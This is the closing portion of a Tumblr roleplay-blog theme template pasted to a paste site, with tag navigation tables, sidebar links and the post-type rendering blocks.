  1104. <p><center><big><big><font color="maker">TAGS & NAV</font></big></big></center>
  1105.  
  1106.  
  1107. <p><center><big><font color="d30000">General</font></big></center>
  1108. <!-- LINKS TABLE LAYOUT by htmltutor -->
  1109.  
  1110. <table>
  1111. <tr>
  1112. <td>
  1113. <div class="linkies">
  1114.  
  1115. <a href="/Verses">Verses</a>
  1116. <a href="/tagged/Aesthetic">Aesthetic</a>
  1117. <a href="/tagged/outofwine">OOC</a>
  1118. <a href="/tagged/Musings">Musings</a>
  1119.  
  1120.  
  1121. </div>
  1122. </td>
  1123. <td>
  1124.  
  1125. <div class="linkies">
  1126.  
  1127. <a href="/tagged/IC-Asks"> In Character Asks</a>
  1128. <a href="/tagged/ᴛʜᴇ-ᴘʀɪᴄᴇ-ɪꜱ-ʀɪᴅɪᴄᴜʟᴏᴜꜱ-[-possessions-]">Possessions</a>
  1129. <a href="/tagged/ohqueue">Queue</a>
  1130. <a href="/tagged/𝒯𝒽𝒾𝓈-𝓈𝒽𝒾𝓉-𝒾𝓈-𝑒𝓍𝓅𝑒𝓃𝓈𝒾𝓋𝑒.-[-fashion-]">Fashion</a>
  1131.  
  1132.  
  1133.  
  1134.  
  1135.  
  1136. </div>
  1137. </td>
  1138. <td>
  1139.  
  1140. <div class="linkies">
  1141.  
  1142. <a href="/tagged/music">Audio</a>
  1143. <a href="/tagged/rpmemes">Memes</a>
  1144. <a href="/tagged/relatable">Relatable</a>
  1145. <a href="/tagged/Drabbles">Drabbles</a>
  1146.  
  1147.  
  1148.  
  1149.  
  1150.  
  1151. </div>
  1152. </td>
  1153. <td>
  1154.  
  1155. </table>
  1156.  
  1157. <p><center><big><font color="d30000">Whatever</font></big></center>
  1158. <!-- LINKS TABLE LAYOUT by htmltutor -->
  1159.  
  1160. <table>
  1161. <tr>
  1162. <td>
  1163. <div class="linkies">
  1164.  
  1165. <a href="/tagged/FC">Face Claim</a>
  1166. <a href="/tagged/familyportrait">Family Portrait</a>
  1167. <a href="/tagged/#f-art">Mun's Art</a>
  1168. <a href="/tagged/#">X</a>
  1169. <a href="/tagged/#">X</a>
  1170. <a href="/tagged/#">X</a>
  1171. <a href="/tagged/#">X</a>
  1172.  
  1173. </div>
  1174. </td>
  1175. <td>
  1176.  
  1177. <div class="linkies">
  1178.  
  1179. <a href="/tagged/#">X</a>
  1180. <a href="/tagged/#">X</a>
  1181. <a href="/tagged/#">X</a>
  1182. <a href="/tagged/#">X</a>
  1183. <a href="/tagged/#">X</a>
  1184. <a href="/tagged/#">X</a>
  1185. <a href="/tagged/#">X</a>
  1186.  
  1187.  
  1188. </div>
  1189. </td>
  1190. <td>
  1191.  
  1192. <div class="linkies">
  1193.  
  1194. <a href="/tagged/#">X</a>
  1195. <a href="/tagged/#">X</a>
  1196. <a href="/tagged/#">X</a>
  1197. <a href="/tagged/#">X</a>
  1198. <a href="/tagged/#">X</a>
  1199. <a href="/tagged/#">X</a>
  1200. <a href="/tagged/#">X</a>
  1201.  
  1202.  
  1203. </div>
  1204. </td>
  1205. <td>
  1206.  
  1207. </table>
  1208.  
  1209. <p><center><big><font color="d30000">People</font></big></center>
  1210.  
  1211. <table>
  1212. <tr>
  1213. <td>
  1214. <div class="linkies">
  1215.  
  1216. <a href="/tagged/#">X</a>
  1217. <a href="/tagged/#">X</a>
  1218. <a href="/tagged/#">X</a>
  1219. <a href="/tagged/#">X</a>
  1220. <a href="/tagged/#">X</a>
  1221. <a href="/tagged/#">X</a>
  1222. <a href="/tagged/#">X</a>
  1223.  
  1224. </div>
  1225. </td>
  1226. <td>
  1227.  
  1228. <div class="linkies">
  1229.  
  1230. <a href="/tagged/#">X</a>
  1231. <a href="/tagged/#">X</a>
  1232. <a href="/tagged/#">X</a>
  1233. <a href="/tagged/#">X</a>
  1234. <a href="/tagged/#">X</a>
  1235. <a href="/tagged/#">X</a>
  1236. <a href="/tagged/#">X</a>
  1237.  
  1238.  
  1239. </div>
  1240. </td>
  1241. <td>
  1242.  
  1243. <div class="linkies">
  1244.  
  1245. <a href="/tagged/#">X</a>
  1246. <a href="/tagged/#">X</a>
  1247. <a href="/tagged/#">X</a>
  1248. <a href="/tagged/#">X</a>
  1249. <a href="/tagged/#">X</a>
  1250. <a href="/tagged/#">X</a>
  1251. <a href="/tagged/#">X</a>
  1252.  
  1253.  
  1254. </div>
  1255. </td>
  1256. <td>
  1257.  
  1258. </table>
  1259.  
  1260. <!-- END OF LINKS TABLE LAYOUT by htmltutor -->
  1261.  
  1262. </div></div></div></div></div></div></div></div></div></div>
  1263.  
  1264.  
  1265.  
  1266. <div id="sidebar">
  1267.  
  1268. <div id="sidebarimage">
  1269. <a href="/"><img src="{image:sidebar}"></a></div>
  1270.  
  1271. <div class="sidebartitle">{text:sidebartitle}</div>
  1272.  
  1273.  
  1274. <div id="alinks">
  1275. <a href="#?w=480" rel="box1" class="poplight" title="File">✖</a>
  1276. </div>
  1277.  
  1278. <div id="blinks">
  1279. <a href="#?w=480" rel="box2" class="poplight" title="Regulations">✖</a>
  1280. </div>
  1281.  
  1282. <div id="clinks">
  1283. <a href="#?w=480" rel="box3" class="poplight" title="Inquiry">✖</a>
  1284. </div>
  1285.  
  1286. <div id="dlinks">
  1287. <a href="#?w=480" rel="box4" class="poplight" title="HUD">✖</a>
  1288. </div>
  1289.  
  1290.  
  1291.  
  1292. <div id="description"> {description}
  1293.  
  1294.  
  1295. <div id="pagination">
  1296. <center>{block:Pagination}
  1297. <div id="pagination">
  1298. {block:PreviousPage}
  1299. <a href="{PreviousPage}">Prev&nbsp;</a>
  1300. {/block:PreviousPage}
  1301.  
  1302. {block:JumpPagination length="5"}
  1303. {block:CurrentPage}
  1304. <span class="current_page">{PageNumber}</span>
  1305. {/block:CurrentPage}
  1306.  
  1307. {block:JumpPage}
  1308. <a class="jump_page" href="{URL}">{PageNumber}</a>
  1309. {/block:JumpPage}
  1310. {/block:JumpPagination}
  1311.  
  1312. {block:NextPage}
  1313. <a href="{NextPage}">&nbsp;Next</a>
  1314. {/block:NextPage}
  1315. </div>
  1316. {/block:Pagination}</div></center></div>
  1317. </div></div></div>
  1318.  
  1319. <div id="entries">{block:Posts}<div id="post">
  1320.  
  1321. {block:Text}<h1>{block:Title}{Title}{/block:Title}</h1>{Body}{/block:Text}
  1322.  
  1323. {block:Photo}{LinkOpenTag}<center><img src="{PhotoURL-400}"></center>{LinkCloseTag}{block:Caption}{Caption}{/block:Caption}{/block:Photo}
  1324.  
  1325. {block:Photoset}<center>{Photoset-400}</center>{block:Caption}{Caption}{/block:Caption}{/block:Photoset}
  1326.  
  1327. {block:Quote}<big><big>"{Quote}"</big></big> {block:Source}<br><br> <div style="text-align: right;">— {Source}</div>{/block:Source}{/block:Quote}
  1328.  
  1329. {block:Link}<h1><a href="{URL}" {Target}>{Name}</a></h1>{block:Description}{Description}{/block:Description}{/block:Link}{hw}
  1330.  
  1331. {block:Link}<h1><a href="{URL}" {Target}>{Name}</a></h1>{block:Description}{Description}{/block:Description}{/block:Link}{blc}
  1332.  
  1333. {block:Chat}{block:Title}<h1>{Title}</h1>{/block:Title}{block:Lines}{block:Label}<b>{Label}</b>{/block:Label} {Line}<br>{/block:Lines}{/block:Chat}{hw}
  1334.  
  1335. {block:Audio}<div class="musicbox"><div class="button">{block:AudioPlayer}{AudioPlayerWhite}{/block:AudioPlayer}</div></div>{block:AlbumArt}<img src="{AlbumArtURL}" class="cover">{/block:AlbumArt}<div class="musicinfo">
  1336. {block:TrackName}<div style="font-size:12px; font-style:italic; padding:5px!imporant;">{TrackName}</div>{/block:Trackname}<br>{block:Artist}<span style="font-size:10px;">{Artist}{/block:Artist}{block:Album} - {Album}</span>{/block:Album}<br><br>{block:PlayCount}<span style="font-style:normal; font-size:8px; text-transform:uppercase; letter-spacing:1px;">{PlayCount} plays</span> {/block:PlayCount}</div><div style="margin-top:20px;">{block:caption}{Caption}{/block:caption}</div>{/block:Audio}
  1337.  
  1338. {block:Video}{Video-500}{block:Caption}{Caption}{/block:Caption}{/block:Video}
  1339.  
  1340. {block:Answer}<div id="ask"><img src="{AskerPortraitURL-24}" style="margin-left:7px;margin-right:13px;border:1px solid #e3e3e3;padding:2px;"></div> <em>{Asker} whispered:</em><br> "{Question}"<br><br>{Answer}{/block:Answer}
  1341.  
  1342. {block:Date}<div id="info"> <a href="{Permalink}">{TimeAgo}</a>
  1343. {/block:Date} {block:NoteCount}&nbsp; ( <font color=#b21500>♥</font> <a href="{Permalink}">{NoteCount}</a> ) {/block:NoteCount}<div style="float:right;">
  1344.  
  1345. {block:RebloggedFrom}<a title="{ReblogParentName}" href="{ReblogParentURL}">via</a> {/block:RebloggedFrom}{block:ContentSource} &nbsp; / &nbsp; <a title="{SourceTitle}" href="{SourceURL}">source</a>{/block:ContentSource} {/block:RebloggedFrom} &nbsp; ( <a href="{ReblogURL}"target="_blank" title="reblog this post"><big>+</big> )</a> </div>
  1346. </div>
  1347.  
  1348.  
  1349. {block:HasTags}
  1350. <div class="tags">
  1351. tagged as:{block:Tags} <a href="{TagURL}">&nbsp; ↳ ️{Tag}</a> {/block:Tags}</div>
  1352. {/block:HasTags}
  1353. <div class="postnote">
  1354. {block:PostNotes}{PostNotes}{/block:PostNotes}
  1355. </div>
  1356. </div>
  1357. {/block:Posts}
  1358.  
  1359. </div>
  1360. <div id="credit"><a href="http://hollywhood.tumblr.com">HW</div>
  1361.  
  1362.  
  1363.  
  1364.  
  1365. </body>
  1366.  
  1367. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement